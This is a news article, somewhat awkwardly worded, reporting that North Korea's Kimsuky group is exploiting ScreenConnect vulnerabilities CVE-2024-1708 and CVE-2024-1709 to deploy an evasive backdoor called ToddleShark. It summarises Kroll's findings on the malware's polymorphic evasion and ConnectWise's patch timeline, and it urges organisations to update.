North Korean hackers are exploiting a critical vulnerability in ConnectWise’s ScreenConnect software to spread new, morphing spy malware.
Two weeks ago, ConnectWise disclosed two flaws in its popular remote desktop application: CVE-2024-1708, a path traversal bug that was given a “high” score of 8.4 out of 10 on the CVSS scale, and CVE -2024-1709, a rare “Critical” Authentication Bypass Bug 10 out of 10. With just a moment to spare, cyber attackers launched the attack, especially Initial Access Broker (IAB) in cahoots with ransomware gangs – with thousands of organizations on the line of fire that he hastens to patch up.
Kimsuky (also known as APT43)The Democratic People’s Republic of Korea (DPRK) Advanced Persistent Threat (APT) also goes into action. According to a new blog post from Kroll, it is exploiting vulnerable versions of ScreenConnect to implement a new backdoor called “ToddleShark”.
“The list of threat actors using the CVE-2024-1709 ScreenConnect vulnerability for initial access is growing,” according to Kroll. “It is therefore imperative to patch ScreenConnect applications.”
ToddleShark is based on the previous Kimsuky malware but stands out with its anti-detection approach.
North Korea exploits ScreenConnect
In recent espionage campaigns, Kimsuky has adopted various customs backdoors, including ReconShark and BabyShark, against government organizations, research centers, think tanks and universities in North America, Europe and Asia.
ToddleShark, the weapon of choice this time, is remarkably similar to BabyShark, but features some important advancements.
Among other functions, ToddleShark collects system information, including configuration details, what security software is installed on the device, and lists of user sessions, network connections, running processes, and more.
It then sends that information to attacker-controlled command and control (C2) servers via cryptographically protected Privacy-Enhanced Mail (PEM) certificates.
“The malware deployed in this case uses execution via a legitimate Microsoft binary, MSHTA, and exhibits elements of polymorphic behavior in the form of changing identity strings in code, changing code location via generated junk code, and using C2 URLs uniquely generated, which may make this malware difficult to detect in some environments,” Kroll researchers said in their post, published today.
How ToddleShark uses randomness for escapism
ToddleShark is most notable for the way it uses random generation algorithms to evade detection. For example, it uses random names for variables and functions to thwart static detection, and randomizes its strings and code ordering to confuse standard signature-based detection.
Interspersed among the normal malicious code are large chunks of junk code and hex encoded code, making the end result a bit confusing.
The blocklist doesn’t work against ToddleShark either, because the hash of the initial payload and the URLs used to download additional stages of the malware are always different.
The fact that detecting this backdoor is so difficult only emphasizes the need for organizations to upgrade, if they haven’t already. A patch and other resources are available for ConnectWise customers on the seller’s website.
A ConnectWise spokesperson outlined the timeline:
“On February 13, an independent researcher reported a potential ScreenConnect vulnerability through our voluntary disclosure process,” the person says. “Once validated, ConnectWise mitigated all ScreenConnect cloud instances within 48 hours. On February 19, we released a patch to all on-premises ScreenConnect customers, posted a security bulletin in the ConnectWise Trust Center, and sent instructions for applying the patch to ScreenConnect customers.”
ConnectWise noted that customers should apply patches to their on-premises ScreenConnect instances immediately.
“At this time, ConnectWise and other cybersecurity firms have found exploits of the ScreenConnect vulnerability on unpatched on-premise instances,” the spokesperson says. “However, cyber attacks can occur through numerous avenues, including vulnerabilities, phishing, and business email compromise. While typically used for IT service delivery and product support, attackers can misuse control tools remote to facilitate malicious activity.”